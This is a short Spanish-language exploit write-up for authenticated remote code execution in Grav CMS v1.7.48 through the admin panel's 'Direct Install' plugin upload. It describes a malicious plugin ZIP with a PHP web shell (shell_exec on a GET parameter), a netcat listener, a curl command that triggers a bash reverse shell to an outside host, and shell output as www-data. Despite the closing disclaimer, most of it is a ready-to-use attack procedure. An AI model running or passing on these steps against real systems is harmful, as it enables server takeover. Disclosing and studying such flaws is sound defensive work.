
Exploit de ejecución remota de código autenticado para Grav CMS v1.7.48 mediante carga de plugin malicioso en la función de Instalación Directa, con prueba de concepto y activación de reverse shell.
Grav CMS v1.7.48 con Admin Plugin v1.10.48 es vulnerable a Ejecución Remota de Código (RCE) a través de la función de subida de plugins "Instalación Directa", permitiendo a administradores autenticados ejecutar código PHP arbitrario en el servidor.
/admin/tools/direct-install (Panel de Administración > Herramientas > Instalación Directa)Prepare un listener:
nc -lvnp 4444
Inicie sesión en el Panel de Administración de Grav como administrador.
Navegue a Herramientas > Instalación Directa
Suba un ZIP de plugin malicioso (evilplugin.zip) estructurado de la siguiente manera:
evilplugin/
├── evilplugin.php ← contiene: shell_exec($_GET['cmd'])
└── blueprints.yaml ← blueprint mínimo para pasar la validación
Desencadene la shell reversa:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Shell reversa recibida:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installSolo con fines educativos y defensivos.